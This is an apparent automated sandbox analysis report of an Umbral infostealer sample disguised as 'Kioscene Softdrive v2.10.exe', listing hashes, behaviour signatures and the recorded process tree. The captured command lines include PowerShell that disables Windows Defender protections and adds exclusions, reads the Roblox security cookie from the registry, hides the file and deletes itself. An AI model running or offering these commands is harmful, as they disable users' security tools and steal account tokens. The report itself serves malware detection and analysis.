Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
02-08-2024 15:23
Behavioral task
behavioral1
Sample
Kioscene Softdrive v2.10.exe
Resource
win7-20240704-en
General
-
Target
Kioscene Softdrive v2.10.exe
-
Size
229KB
-
MD5
18dff45f8e9eb29b0fb13e341bdd8dfc
-
SHA1
768114e6ed8a6dab7eec0e677d53430c37e5393e
-
SHA256
dfaadfbf1693ea477fde1a960b20280daa82e35128f537a62859bc5aeff9a948
-
SHA512
ace88964c82470394bd18f6b1ca16fecdf3394b0900f0b375dc358bd8577828e7041c35d9bb790b9d91b062df9167963221f6c7ab62740c6f5ae1e9861c5f223
-
SSDEEP
6144:lloZM+rIkd8g+EtXHkv/iD44lU3HdmOhOU9va6v1Nb8e1mpi:noZtL+EP84lU3HdmOhOU9va6vXj
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral2/memory/3904-1-0x000001190D720000-0x000001190D760000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4632 powershell.exe 3640 powershell.exe 828 powershell.exe 224 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Kioscene Softdrive v2.10.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 8 discord.com 9 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2332 cmd.exe 2580 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2120 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2580 PING.EXE -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 3904 Kioscene Softdrive v2.10.exe 4632 powershell.exe 4632 powershell.exe 3640 powershell.exe 3640 powershell.exe 828 powershell.exe 828 powershell.exe 4996 powershell.exe 4996 powershell.exe 224 powershell.exe 224 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3904 Kioscene Softdrive v2.10.exe Token: SeIncreaseQuotaPrivilege 2852 wmic.exe Token: SeSecurityPrivilege 2852 wmic.exe Token: SeTakeOwnershipPrivilege 2852 wmic.exe Token: SeLoadDriverPrivilege 2852 wmic.exe Token: SeSystemProfilePrivilege 2852 wmic.exe Token: SeSystemtimePrivilege 2852 wmic.exe Token: SeProfSingleProcessPrivilege 2852 wmic.exe Token: SeIncBasePriorityPrivilege 2852 wmic.exe Token: SeCreatePagefilePrivilege 2852 wmic.exe Token: SeBackupPrivilege 2852 wmic.exe Token: SeRestorePrivilege 2852 wmic.exe Token: SeShutdownPrivilege 2852 wmic.exe Token: SeDebugPrivilege 2852 wmic.exe Token: SeSystemEnvironmentPrivilege 2852 wmic.exe Token: SeRemoteShutdownPrivilege 2852 wmic.exe Token: SeUndockPrivilege 2852 wmic.exe Token: SeManageVolumePrivilege 2852 wmic.exe Token: 33 2852 wmic.exe Token: 34 2852 wmic.exe Token: 35 2852 wmic.exe Token: 36 2852 wmic.exe Token: SeIncreaseQuotaPrivilege 2852 wmic.exe Token: SeSecurityPrivilege 2852 wmic.exe Token: SeTakeOwnershipPrivilege 2852 wmic.exe Token: SeLoadDriverPrivilege 2852 wmic.exe Token: SeSystemProfilePrivilege 2852 wmic.exe Token: SeSystemtimePrivilege 2852 wmic.exe Token: SeProfSingleProcessPrivilege 2852 wmic.exe Token: SeIncBasePriorityPrivilege 2852 wmic.exe Token: SeCreatePagefilePrivilege 2852 wmic.exe Token: SeBackupPrivilege 2852 wmic.exe Token: SeRestorePrivilege 2852 wmic.exe Token: SeShutdownPrivilege 2852 wmic.exe Token: SeDebugPrivilege 2852 wmic.exe Token: SeSystemEnvironmentPrivilege 2852 wmic.exe Token: SeRemoteShutdownPrivilege 2852 wmic.exe Token: SeUndockPrivilege 2852 wmic.exe Token: SeManageVolumePrivilege 2852 wmic.exe Token: 33 2852 wmic.exe Token: 34 2852 wmic.exe Token: 35 2852 wmic.exe Token: 36 2852 wmic.exe Token: SeDebugPrivilege 4632 powershell.exe Token: SeDebugPrivilege 3640 powershell.exe Token: SeDebugPrivilege 828 powershell.exe Token: SeDebugPrivilege 4996 powershell.exe Token: SeIncreaseQuotaPrivilege 4748 wmic.exe Token: SeSecurityPrivilege 4748 wmic.exe Token: SeTakeOwnershipPrivilege 4748 wmic.exe Token: SeLoadDriverPrivilege 4748 wmic.exe Token: SeSystemProfilePrivilege 4748 wmic.exe Token: SeSystemtimePrivilege 4748 wmic.exe Token: SeProfSingleProcessPrivilege 4748 wmic.exe Token: SeIncBasePriorityPrivilege 4748 wmic.exe Token: SeCreatePagefilePrivilege 4748 wmic.exe Token: SeBackupPrivilege 4748 wmic.exe Token: SeRestorePrivilege 4748 wmic.exe Token: SeShutdownPrivilege 4748 wmic.exe Token: SeDebugPrivilege 4748 wmic.exe Token: SeSystemEnvironmentPrivilege 4748 wmic.exe Token: SeRemoteShutdownPrivilege 4748 wmic.exe Token: SeUndockPrivilege 4748 wmic.exe Token: SeManageVolumePrivilege 4748 wmic.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 3904 wrote to memory of 2852 3904 Kioscene Softdrive v2.10.exe 79 PID 3904 wrote to memory of 2852 3904 Kioscene Softdrive v2.10.exe 79 PID 3904 wrote to memory of 3580 3904 Kioscene Softdrive v2.10.exe 82 PID 3904 wrote to memory of 3580 3904 Kioscene Softdrive v2.10.exe 82 PID 3904 wrote to memory of 4632 3904 Kioscene Softdrive v2.10.exe 84 PID 3904 wrote to memory of 4632 3904 Kioscene Softdrive v2.10.exe 84 PID 3904 wrote to memory of 3640 3904 Kioscene Softdrive v2.10.exe 86 PID 3904 wrote to memory of 3640 3904 Kioscene Softdrive v2.10.exe 86 PID 3904 wrote to memory of 828 3904 Kioscene Softdrive v2.10.exe 88 PID 3904 wrote to memory of 828 3904 Kioscene Softdrive v2.10.exe 88 PID 3904 wrote to memory of 4996 3904 Kioscene Softdrive v2.10.exe 90 PID 3904 wrote to memory of 4996 3904 Kioscene Softdrive v2.10.exe 90 PID 3904 wrote to memory of 4748 3904 Kioscene Softdrive v2.10.exe 92 PID 3904 wrote to memory of 4748 3904 Kioscene Softdrive v2.10.exe 92 PID 3904 wrote to memory of 4844 3904 Kioscene Softdrive v2.10.exe 94 PID 3904 wrote to memory of 4844 3904 Kioscene Softdrive v2.10.exe 94 PID 3904 wrote to memory of 3560 3904 Kioscene Softdrive v2.10.exe 96 PID 3904 wrote to memory of 3560 3904 Kioscene Softdrive v2.10.exe 96 PID 3904 wrote to memory of 224 3904 Kioscene Softdrive v2.10.exe 98 PID 3904 wrote to memory of 224 3904 Kioscene Softdrive v2.10.exe 98 PID 3904 wrote to memory of 2120 3904 Kioscene Softdrive v2.10.exe 100 PID 3904 wrote to memory of 2120 3904 Kioscene Softdrive v2.10.exe 100 PID 3904 wrote to memory of 2332 3904 Kioscene Softdrive v2.10.exe 102 PID 3904 wrote to memory of 2332 3904 Kioscene Softdrive v2.10.exe 102 PID 2332 wrote to memory of 2580 2332 cmd.exe 104 PID 2332 wrote to memory of 2580 2332 cmd.exe 104 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3580 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Kioscene Softdrive v2.10.exe"C:\Users\Admin\AppData\Local\Temp\Kioscene Softdrive v2.10.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3904 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2852
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Kioscene Softdrive v2.10.exe"2⤵
- Views/modifies file attributes
PID:3580
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Kioscene Softdrive v2.10.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4632
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:828
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4996
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4748
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:4844
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:3560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:224
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:2120
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Kioscene Softdrive v2.10.exe" && pause2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\system32\PING.EXEping localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2580
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
948B
MD5994d48c590292933efa0627922c9fc59
SHA1696a9fed9578a4f0f73e598f9d71a0c1f9d04090
SHA256f61c0e17ef24ce95d3d00170c5553c9b5b536d24c0d8e6e7480b3e2eb3855a02
SHA512f61d859fc00bf1009e6d72a0536fcd3d95d7f06016ed44dcdc1d91a872dad8abda02c7f409dcb9d0e5ea8c8c75b0d8683a60ea57045639402c37eca9eab77940
-
Filesize
1KB
MD52a75c2057536d71d287d7cefff04eec3
SHA1c61131dee25db97244118daaf982c0bd1389b8b4
SHA25693cf99b87df289b80cc8be11623fbb0b09812f2dcee9986e76cedb188ca942a0
SHA5121d8877aeade86757fb7d37b54abf27e8d6579a7a51bcbba549bcfd0c66a2b4383ab7f34eb4621c031262df4e5266332e1427f64af268922e24c24ed9ca94f150
-
Filesize
1KB
MD5288f76eb6350b99897bf8a40a26d7b88
SHA17f386d05202de2cf090bbda84d633a640730e090
SHA2561b9a2714ecfaf4b2e7d7961d5f2537ea360ad0df46a0fa789255235b077075d1
SHA512ffafc9d47140408afba98a9832433c0829ba696524c56d03f4ce67ae84d369c658d3a0b3cbfc62f8e5d83fc91f8f73fc1dd9a27f0deaefd1d07485a63face869
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82